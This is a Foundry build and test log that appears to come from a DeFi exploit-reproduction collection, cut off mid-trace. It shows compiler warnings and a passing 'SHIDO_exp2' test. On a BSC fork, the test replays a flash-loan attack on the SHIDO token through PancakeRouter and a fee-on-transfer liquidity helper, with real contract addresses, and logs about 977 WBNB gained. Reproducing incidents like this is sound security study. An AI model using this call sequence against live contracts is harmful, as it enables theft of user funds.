Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-06/SHIDO_exp2.sol:22:5:
   |
22 |     IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/SHIDO_exp2.sol:51:31:
   |
51 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/SHIDO_exp2.sol:51:67:
   |
51 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/SHIDO_exp2.sol:51:88:
   |
51 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 874.55ms (1.90ms CPU time)

Ran 1 test for src/test/2023-06/SHIDO_exp2.sol:ShidoTest
[PASS] testExploit() (gas: 1532133)
Logs:
  [Start] WBNB amount before attack: 0.000000000000000000
  [End] WBNB amount after attack: 976.975297305562276696

Traces:
  [26767] ShidoTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 29365171 [2.936e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], "WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], "SHIDOInu")
    │   └─ ← [Return]
    ├─ [0] VM::label(SHIDO: [0xa963eE460Cf4b474c35ded8fFF91c4eC011FB640], "SHIDO")
    │   └─ ← [Return]
    ├─ [0] VM::label(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], "DPPAdvanced")
    │   └─ ← [Return]
    ├─ [0] VM::label(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "PancakeRouter")
    │   └─ ← [Return]
    ├─ [0] VM::label(AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], "AddRemoveLiquidityForFeeOnTransferTokens")
    │   └─ ← [Return]
    ├─ [0] VM::label(ShidoLock: [0xaF0CA21363219C8f3D8050E7B61Bb5f04e02F8D4], "ShidoLock")
    │   └─ ← [Return]
    └─ ← [Stop]

  [1735833] ShidoTest::testExploit()
    ├─ [2534] WBNB::balanceOf(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2444] WBNB::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "[Start] WBNB amount before attack", val: 0, decimals: 18)
    ├─ [1710333] DPPAdvanced::flashLoan(40000000000000000000 [4e19], 0, ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [1707634] 0x7f60701206F85354147806a846CE59Bb7467ac53::flashLoan(40000000000000000000 [4e19], 0, ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00) [delegatecall]
    │   │   ├─ [27962] WBNB::transfer(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 40000000000000000000 [4e19])
    │   │   │   ├─ emit Transfer(from: DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], to: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 40000000000000000000 [4e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000022b1c8c1227a00000
    │   │   │   │   @ 0x3c60da1376f85a7f3c888682818856b0c611572c8d06dc51114a9951a6f90e17: 0x0000000000000000000000000000000000000000000000339921a4b40de4e632 → 0x0000000000000000000000000000000000000000000000316e0518a1e644e632
    │   │   │   └─ ← [Return] true
    │   │   ├─ [1653246] ShidoTest::DPPFlashLoanCall(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 40000000000000000000 [4e19], 0, 0x00)
    │   │   │   ├─ [24420] WBNB::approve(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [24683] SHIDOInu::approve(AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xf947576712b5cc461abb50952c228703dd937cc767310a5cb2464dd55e8490c5: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [24683] SHIDOInu::approve(ShidoLock: [0xaF0CA21363219C8f3D8050E7B61Bb5f04e02F8D4], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: ShidoLock: [0xaF0CA21363219C8f3D8050E7B61Bb5f04e02F8D4], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xbfbd819bee7413a014b56cf4a503f98b570a1273403ef6f1c629ebd3e612b335: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [24690] SHIDO::approve(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [251491] PancakeRouter::swapExactTokensForTokensSupportingFeeOnTransferTokens(39000000000000000000 [3.9e19], 20, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x733Af324146DCfe743515D8D77DC25140a07F9e0], AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], 1687561337 [1.687e9])
    │   │   │   │   ├─ [8225] WBNB::transferFrom(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, 39000000000000000000 [3.9e19])
    │   │   │   │   │   ├─ emit Transfer(from: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, value: 39000000000000000000 [3.9e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000022b1c8c1227a00000 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   │   │   @ 0x52e8c781a0094a02203a911a596e19fd4afe17e0de878ad829f1c65fdec48e5c: 0x00000000000000000000000000000000000000000000000255049c568d9cb316 → 0x000000000000000000000000000000000000000000000004724071b50dd8b316
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [54398] SHIDOInu::balanceOf(AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [2893] 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 21978525030516602360 [2.197e19], 43019681436106797846 [4.301e19], 1687561189 [1.687e9]
    │   │   │   │   ├─ [534] WBNB::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   └─ ← [Return] 82019681436106797846 [8.201e19]
    │   │   │   │   ├─ [161351] 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464::swap(10436972685676390697 [1.043e19], 0, AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], 0x)
    │   │   │   │   │   ├─ [113107] SHIDOInu::transfer(AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], 10436972685676390697 [1.043e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, to: AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], value: 10436972685676390697 [1.043e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x78d66bb6e52cf8b5a2f5c78744a88db9f806920fa6e8affb86d03d44a6fad3e2: 0x31a0de8aa05e30960b2caa8bd532a1c6f6e15b74b84d8cc5b51c9d7c00e2fb85 → 0x1a0fb0bcfb25e5946e1127c487be18ada8f9394f323f5e76be56dbaeb61e8592
    │   │   │   │   │   │   │   @ 0x8bf0fbbf83b2a2fb4d708171a4b0d9cca3a1d152450e64bc374f362ee2235e9c: 0 → 0x17912dcda5384b019d1b82c74d7489194de82225860e2e4ef6c5c1cd4ac475f3
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [14398] SHIDOInu::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 11541552344840211663 [1.154e19]
    │   │   │   │   │   ├─ [534] WBNB::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 82019681436106797846 [8.201e19]
    │   │   │   │   │   ├─ emit Sync(reserve0: 11541552344840211663 [1.154e19], reserve1: 82019681436106797846 [8.201e19])
    │   │   │   │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 0, amount1In: 39000000000000000000 [3.9e19], amount0Out: 10436972685676390697 [1.043e19], amount1Out: 0, to: AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x649623e500000000000255049c568d9cb316000000000001310368116af935f8 → 0x64962415000000000004724071b50dd8b316000000000000a02bd4b536c70ccf
    │   │   │   │   │   │   @ 10: 0x000000000000000000000000000000115391da058b5ca5bebdac1818d9450934 → 0x0000000000000000000000000000001153aa5fe525434953b8a4aa2d4de1cb74
    │   │   │   │   │   │   @ 9: 0x00000000000000000000000000026a8e3a0107afffd1de8b4eab0f67d45686a9 → 0x00000000000000000000000000026a8e3a5efb9ce9f7ba2251cc034d9cb4e3f9
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [14398] SHIDOInu::balanceOf(AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 10436972685676390697 [1.043e19]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [9195] WBNB::withdraw(10000000000000000 [1e16])
    │   │   │   │   ├─ [55] ShidoTest::receive{value: 10000000000000000}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Withdrawal(src: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 10000000000000000 [1e16])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0x0000000000000000000000000000000000000000000000000dbd2fc137a30000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [172326] PancakeRouter::swapExactTokensForTokensSupportingFeeOnTransferTokens(100000000000000000 [1e17], 20, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x733Af324146DCfe743515D8D77DC25140a07F9e0], ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1687561337 [1.687e9])
    │   │   │   │   ├─ [3425] WBNB::transferFrom(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, 100000000000000000 [1e17])
    │   │   │   │   │   ├─ emit Transfer(from: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, value: 100000000000000000 [1e17])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x52e8c781a0094a02203a911a596e19fd4afe17e0de878ad829f1c65fdec48e5c: 0x000000000000000000000000000000000000000000000004724071b50dd8b316 → 0x00000000000000000000000000000000000000000000000473a3b72d6b62b316
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000000dbd2fc137a30000 → 0x0000000000000000000000000000000000000000000000000c59ea48da190000
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [18398] SHIDOInu::balanceOf(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [893] 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 11541552344840211663 [1.154e19], 82019681436106797846 [8.201e19], 1687561237 [1.687e9]
    │   │   │   │   ├─ [534] WBNB::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   └─ ← [Return] 82119681436106797846 [8.211e19]
    │   │   │   │   ├─ [127486] 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464::swap(14019457103688779 [1.401e16], 0, ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   ├─ [98526] SHIDOInu::transfer(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 14019457103688779 [1.401e16])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, to: 0x2B7F760F37A23832E9766AeA69Dc02a038E96BB1, value: 841167426221326 [8.411e14])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, to: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 14019457103690 [1.401e13])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5982c18f27cf1d76b1575aafa82632142d484bf9cf9ec41c746a790053b98155: 0x0019895cb6d21022735fbb6cc0c0952536ef8d91465bf928ae320d501ebef7dd → 0x002125730f1d53d745392bf11a6dafe994d8da16cf99d20bf559e29da38a4d5e
    │   │   │   │   │   │   │   @ 0x20ba2c10a413242b8ef9dd7422852e401029c425619c5915a50e9dd3f2c46a87: 0x002cc693bfa7fe76441cc25cc3b2ac4731511617c78f830164643a6707a02207 → 0x002d430e3970477d9d7c6179379b286babbdf88c9babaca05e81b6a06b063941
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000002131ba1346afd65419697ad8281a95e660cbe6497877598c1c238e6c50e
    │   │   │   │   │   │   │   @ 0x78d66bb6e52cf8b5a2f5c78744a88db9f806920fa6e8affb86d03d44a6fad3e2: 0x1a0fb0bcfb25e5946e1127c487be18ada8f9394f323f5e76be56dbaeb61e8592 → 0x1a0796190d71246d4572d68d227aff432744a4481680c46d0778c865950653c9
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [14398] SHIDOInu::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 11527532887736522884 [1.152e19]
    │   │   │   │   │   ├─ [534] WBNB::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 82119681436106797846 [8.211e19]
    │   │   │   │   │   ├─ emit Sync(reserve0: 11527532887736522884 [1.152e19], reserve1: 82119681436106797846 [8.211e19])
    │   │   │   │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 0, amount1In: 100000000000000000 [1e17], amount0Out: 14019457103688779 [1.401e16], amount1Out: 0, to: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x64962415000000000004724071b50dd8b316000000000000a02bd4b536c70ccf → 0x6496241500000000000473a3b72d6b62b3160000000000009ffa0615fe2b1884
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [14398] SHIDOInu::balanceOf(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 14019457103690 [1.401e13]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [782084] AddRemoveLiquidityForFeeOnTransferTokens::addLiquidityETH{value: 10000000000000000}(SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], 1000000000 [1e9], 1, 1, ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1687561337 [1.687e9])
    │   │   │   │   ├─ [426129] SHIDOInu::transferFrom(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], 1000000000 [1e9])
    │   │   │   │   │   ├─ [275] PancakeRouter::WETH() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]
    │   │   │   │   │   ├─ emit Approval(owner: SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 25000000000000000 [2.5e16])
    │   │   │   │   │   ├─ [156101] PancakeRouter::swapExactTokensForETHSupportingFeeOnTransferTokens(25000000000000000 [2.5e16], 0, [0x733Af324146DCfe743515D8D77DC25140a07F9e0, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], 1687561237 [1.687e9])
    │   │   │   │   │   │   ├─ [62739] SHIDOInu::transferFrom(SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, 25000000000000000 [2.5e16])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], to: 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, value: 25000000000000000 [2.5e16])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 0)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x5982c18f27cf1d76b1575aafa82632142d484bf9cf9ec41c746a790053b98155: 0x002125730f1d53d745392bf11a6dafe994d8da16cf99d20bf559e29da38a4d5e → 0x0012b1e04dd37e31ea637512c2cf8d7a59a47ddb6dcfb6815dec70968616cd5e
    │   │   │   │   │   │   │   │   @ 0x78d66bb6e52cf8b5a2f5c78744a88db9f806920fa6e8affb86d03d44a6fad3e2: 0x1a0796190d71246d4572d68d227aff432744a4481680c46d0778c865950653c9 → 0x1a1609abcebafa12a0488d6b7a1921b262790083784adff79ee63a6cb279d3c9
    │   │   │   │   │   │   │   │   @ 0x9819b2e97d75e163ba29ee2b7f0befb9446ca45221f008f73899877bd42ee3f6: 0x0000000000000000000000000000000000000000000000000058d15e17628000 → 0
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [893] 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 11527532887736522884 [1.152e19], 82119681436106797846 [8.211e19], 1687561237 [1.687e9]
    │   │   │   │   │   │   ├─ [14398] SHIDOInu::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 11552532887736522884 [1.155e19]
    │   │   │   │   │   │   ├─ [54122] 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464::swap(0, 177265942874591576 [1.772e17], PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 0x)
    │   │   │   │   │   │   │   ├─ [25162] WBNB::transfer(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 177265942874591576 [1.772e17])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, to: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 177265942874591576 [1.772e17])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x0000000000000000000000000000000000000000000000000275c66f93d09158
    │   │   │   │   │   │   │   │   │   @ 0x52e8c781a0094a02203a911a596e19fd4afe17e0de878ad829f1c65fdec48e5c: 0x00000000000000000000000000000000000000000000000473a3b72d6b62b316 → 0x000000000000000000000000000000000000000000000004712df0bdd79221be
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [14398] SHIDOInu::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 11552532887736522884 [1.155e19]
    │   │   │   │   │   │   │   ├─ [534] WBNB::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 81942415493232206270 [8.194e19]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 11552532887736522884 [1.155e19], reserve1: 81942415493232206270 [8.194e19])
    │   │   │   │   │   │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 25000000000000000 [2.5e16], amount1In: 0, amount0Out: 0, amount1Out: 177265942874591576 [1.772e17], to: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 8: 0x6496241500000000000473a3b72d6b62b3160000000000009ffa0615fe2b1884 → 0x64962415000000000004712df0bdd79221be000000000000a052d774158d9884
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [534] WBNB::balanceOf(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 177265942874591576 [1.772e17]
    │   │   │   │   │   │   ├─ [9223] WBNB::withdraw(177265942874591576 [1.772e17])
    │   │   │   │   │   │   │   ├─ [83] PancakeRouter::fallback{value: 177265942874591576}()
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit Withdrawal(src: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], wad: 177265942874591576 [1.772e17])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x0000000000000000000000000000000000000000000000000275c66f93d09158 → 0
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [55] SHIDOInu::fallback{value: 177265942874591576}()
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Approval(owner: SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 25000000000000000 [2.5e16])
    │   │   │   │   │   ├─ [178108] PancakeRouter::addLiquidityETH{value: 177265942874591576}(SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], 25000000000000000 [2.5e16], 0, 0, 0x7ef6E527969054afbc0980E00C51D2E645b4A5ef, 1687561237 [1.687e9])
